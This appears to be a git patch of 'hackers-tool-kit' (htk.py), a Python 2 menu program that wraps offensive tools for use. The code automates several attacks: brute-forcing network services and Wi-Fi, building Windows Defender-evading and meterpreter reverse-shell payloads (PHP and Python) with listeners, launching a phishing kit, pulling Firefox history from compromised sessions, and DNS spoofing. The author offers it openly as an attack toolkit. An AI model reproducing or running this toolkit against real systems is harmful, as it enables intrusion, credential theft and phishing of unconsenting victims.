md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - -#COMPILE C START# -#---------------# -def compilec(): - print "filename / filepath" - r = raw_input("> ") - print "\nfilename2 / filepath2" - h = raw_input("> ") - - a = 'g++ {0} -o {1}'.format(r,h) - os.system(a) -#COMPILE C END# -#-------------# - -#DNS SPOOF START# -#---------------# -def dnsspoof(): - target = raw_input("\033[1mTarget:\033[0m ") - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dns.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) - os.system('echo "dns.spoof on\n" >> dns.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dns.cap") - os.system("rm dns.cap") - -def dnsspoofall(): - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dnsall.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') - os.system('echo "dns.spoof on\n" >> dnsall.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dnsall.cap") - os.system("rm dnsall.cap") - - -#-------------# -#DNS SPOOF END# - - -#REBOOT HTK START# -#----------# -def reboot(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() -#--------------# -#REBOOT HTK END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - try: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit": - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - if x == "compilec": - compilec() - if x == "dnsspoof": - dnsspoof() - if x == "dnsspoofall": - dnsspoofall() - if x == "htk-lite": - os.system("python /root/hackers-tool-kit/htk-lite/htkl.py") - if x == "reboot": - reboot() - except: - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - found = True - -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 930da01853bba6a4470608c20ec0e58d36655ca9 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 Apr 2020 09:18:21 -0400 Subject: [PATCH 211/214] Add files via upload --- htk.py | 3463 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3463 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..78736b4 --- /dev/null +++ b/htk.py @@ -0,0 +1,3463 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" + + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +import readline +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + 